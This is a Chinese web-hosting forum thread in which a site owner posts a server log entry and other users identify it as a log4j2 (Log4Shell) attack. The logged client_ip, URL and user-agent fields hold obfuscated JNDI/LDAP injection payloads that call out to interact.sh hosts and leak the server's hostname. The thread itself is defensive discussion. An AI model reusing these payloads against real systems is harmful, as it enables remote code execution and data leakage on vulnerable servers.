全球主机交流论坛

标题: 这是个什么攻击方式？ [打印本页]

作者: lspro 时间: 2021-12-14 10:41
标题: 这是个什么攻击方式？
今早看了下日志，发现有一条这样的的记录

{"client_ip":"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh}","local_time":"2021-12-14 05:58:45","server_name":"xxx.com","req_url":"\/?x=${jndi:ldap:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gg.interact.sh\/a}","attack_method":"Deny_URL_Args","req_data":"-","rule_tag":"\\$\\{","user_agent":"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7ge.interact.sh}"}

复制代码

居然看不到IP，有带老懂吗

作者: loliwin 时间: 2021-12-14 10:44
这不就是大红大紫的log4j漏洞么。

作者: tkn 时间: 2021-12-14 11:09
是 log4j2 漏洞，互联网的小学生都知道了

作者: 李嘉诚 时间: 2021-12-14 11:11

loliwin 发表于 2021-12-14 10:44
这不就是大红大紫的log4j漏洞么。

wp 小站需要怕吗？

作者: 920 时间: 2021-12-14 11:18
wp站不是PHP的嘛，log4j好像是java项目的。是不是有其他组件用到了。没看到IP地址，但是他里面不是有域名嘛.sh的域名

作者: 920 时间: 2021-12-14 11:20
正在 Ping c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh [46.101.25.250] 具有 32 字节的数据:
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=175ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47

作者: 百度网盘 时间: 2021-12-14 11:20
昨天好几个网站都碰到了这个，宝塔的防火墙还是可以的，都给拦截了

作者: 16qf 时间: 2021-12-14 11:34

Apache关我nginx什么事

欢迎光临全球主机交流论坛 (https://mjj.022333.xyz/)